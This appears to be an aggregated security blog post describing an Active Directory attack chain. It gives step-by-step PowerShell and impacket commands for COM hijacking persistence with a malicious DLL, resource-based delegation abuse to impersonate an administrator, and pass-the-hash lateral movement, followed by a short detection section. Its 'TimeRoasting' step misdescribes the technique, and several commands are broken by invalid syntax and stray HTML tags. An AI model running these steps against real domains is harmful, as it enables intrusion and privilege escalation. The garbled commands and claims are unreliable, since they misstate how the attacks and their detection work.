The AD Attacker’s Trifecta: TimeRoasting, COM Hijacking & Resource-Based Delegation

Listen to this Post

Featured Image

Introduction:

Active Directory environments present a complex attack surface where multiple vulnerability chains can create a path to domain dominance. This analysis explores an advanced attack sequence combining TimeRoasting, COM hijacking persistence, and resource-based constrained delegation exploitation, demonstrating how attackers can pivot from initial reconnaissance to full domain compromise through clever abuse of Windows authentication mechanisms and persistence techniques.

Learning Objectives:

  • Understand the TimeRoasting attack vector and identify vulnerable machine accounts
  • Implement COM hijacking for stealthy persistence in Windows environments
  • Master resource-based constrained delegation attacks for privilege escalation
  • Develop detection strategies for these advanced attack techniques

You Should Know:

1. TimeRoasting: The Machine Account Attack Vector

TimeRoasting exploits machine accounts with manually set passwords that don’t rotate automatically. While normal machine accounts should automatically change their passwords every 30 days, administrators sometimes set static passwords for service accounts or specific purposes, creating this vulnerability.

Step-by-step guide:

First, identify potentially vulnerable accounts using BloodHound queries or PowerShell:

 Find computers with old password last set dates
Get-ADComputer -Filter  -Properties PasswordLastSet | 
Where-Object {$_.PasswordLastSet -lt (Get-Date).AddDays(-30)} |
Select-Name, PasswordLastSet

Using PowerView alternative
Get-DomainComputer -Properties Name, PasswordLastSet | 
Where-Object {$_.PasswordLastSet -lt (Get-Date).AddDays(-30)}

Once identified, perform the TimeRoasting attack to retrieve the machine account password hash:

 Using impacket's getTGT with the computer account name
python3 getTGT.py -dc-ip 10.10.10.10 DOMAIN/COMPUTERNAME$
 You'll be prompted for the password, which you might have from other means

The attack works because these static machine passwords can be cracked or used directly, unlike regularly rotating machine accounts.

2. COM Hijacking: Stealthy Persistence Mechanism

Component Object Model (COM) hijacking provides persistent access that evades common detection methods by leveraging legitimate Windows processes and registry modifications rather than traditional autostart locations.

Step-by-step guide:

Identify COM objects that load from user-writable locations:

 Check for COM registry entries
Get-ChildItem "HKCU:\Software\Classes\CLSID" -Recurse | 
Where-Object {$_.Property -contains "LocalServer32"}

Look for InProcServer32 with user-writable paths
Get-ChildItem "HKCU:\Software\Classes\CLSID" -Name | 
ForEach-Object {
$path = "HKCU:\Software\Classes\CLSID\$<em>"
if (Test-Path "$path\InProcServer32") {
$value = Get-ItemProperty -Path "$path\InProcServer32" -Name "(default)" -ErrorAction SilentlyContinue
if ($value -and $value."(default)" -notlike "system32") {
Write-Host "Suspicious COM: $</em> - $($value."(default)")"
}
}
}

Create a malicious COM hijack that triggers when users interact with specific file types:

 Create registry entries for COM hijacking
New-Item -Path "HKCU:\Software\Classes\CLSID{01234567-89AB-CDEF-0123-456789ABCDEF}" -Force
New-Item -Path "HKCU:\Software\Classes\CLSID{01234567-89AB-CDEF-0123-456789ABCDEF}\InProcServer32" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\CLSID{01234567-89AB-CDEF-0123-456789ABCDEF}\InProcServer32" -Name "(default)" -Value "C:\Users\Public\malicious.dll"

This persistence is particularly effective because it doesn’t trigger during standard login events but during specific user actions like file exploration.

3. Resource-Based Constrained Delegation Exploitation

Resource-based constrained delegation (RBCD) allows attackers to configure delegation permissions when they have write access to a computer object, enabling them to forge Kerberos tickets for privilege escalation.

Step-by-step guide:

First, check if you have the necessary permissions to modify computer objects:

 Using PowerView to check computer object permissions
Get-DomainComputer | Get-DomainObjectAcl | 
Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser -Identity attacker).objectsid}

Check for GenericAll, GenericWrite, or WriteProperty permissions
Get-DomainObjectAcl -Identity targetcomputer$ | 
Where-Object {
$<em>.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty" -and
$</em>.SecurityIdentifier -eq (Get-DomainUser -Identity attacker).objectsid
}

Configure RBCD to enable ticket forging:

 Using PowerView to set RBCD
Set-DomainObject -Identity targetcomputer$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$('')}

Add our controlled computer to the allowed list
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-123456789-123456789-123456789-1111)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-DomainObject -Identity targetcomputer$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Finally, perform the S4U2self and S4U2proxy attacks to gain access:

 Using impacket's getST with RBCD
python3 getST.py -spn cifs/targetcomputer.domain.com -impersonate administrator -dc-ip 10.10.10.10 domain/controlledcomputer$

4. Protected Users Group Bypass Techniques

The Protected Users group imposes strict Kerberos restrictions that can block traditional ticket usage, requiring alternative authentication methods.

Step-by-step guide:

When dealing with Protected Users group members, leverage alternative authentication methods:

 Use SMB instead of Kerberos for file access
net use \targetcomputer\c$ /user:domain\user password

Leverage WMI with explicit credentials
Get-WmiObject -Class Win32_Process -ComputerName targetcomputer -Credential (Get-Credential)

Use PowerShell remoting with explicit credentials
Enter-PSSession -ComputerName targetcomputer -Credential (Get-Credential)

For lateral movement, consider Pass-the-Hash when Kerberos is restricted:

 Using impacket's psexec with hash
python3 psexec.py -hashes :NTLMhash domain/user@targetcomputer

5. Detection and Mitigation Strategies

Organizations need layered detection strategies to identify these advanced attacks across the kill chain.

Step-by-step guide:

Implement detection for TimeRoasting attempts:

 Monitor for AS-REP roasting attacks (similar detection logic)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | 
Where-Object {$<em>.Message -like "preauth" -and $</em>.Message -like "false"}

Detect COM hijacking through registry monitoring:

 Monitor for unusual COM registry modifications
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=12,13} | 
Where-Object {$<em>.Message -like "CLSID" -and $</em>.Message -like "InProcServer32"}

Monitor for RBCD configuration changes:

 Detect RBCD modifications
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5136} | 
Where-Object {$_.Message -like "msDS-AllowedToActOnBehalfOfOtherIdentity"}

Mitigation strategies include:

  • Enforcing machine account password rotations
  • Implementing LAPS for local administrator passwords
  • Restricting computer object modification permissions
  • Monitoring for unusual SPN requests and ticket operations

What Undercode Say:

  • Machine account hygiene is critical – monitor password last set dates and enforce automatic rotation policies
  • COM hijacking represents the new frontier in persistence – traditional autorun detection misses these advanced techniques
  • Resource-based constrained delegation attacks demonstrate why write permissions on computer objects should be tightly controlled
  • The Protected Users group effectively blocks many attack techniques but requires complementary controls

This attack chain demonstrates the sophisticated tradecraft modern adversaries employ against Active Directory environments. The progression from TimeRoasting to COM hijacking and finally RBCD exploitation shows how attackers leverage multiple techniques that individually might not provide full domain access, but when chained together create a path to complete compromise. Defenders must implement comprehensive monitoring that covers authentication anomalies, registry modifications for persistence, and delegation configuration changes. The reality is that AD environments contain numerous attack vectors that are difficult to fully harden, requiring defense-in-depth strategies that assume breach and focus on rapid detection and response.

Prediction:

As Microsoft continues to harden traditional attack vectors like Kerberoasting and Golden Ticket attacks, we’ll see increased focus on niche techniques like TimeRoasting and RBCD exploitation. Machine identity management will become the next battleground in AD security, with increased attention to computer account hygiene and delegation configurations. COM hijacking and similar “living off the land” persistence techniques will proliferate as EDR solutions improve at detecting traditional malware. The future of AD attacks lies in abusing legitimate business functionality rather than exploiting software vulnerabilities, making detection more challenging and requiring behavioral analytics rather than signature-based approaches.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Ippsec Hackthebox – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky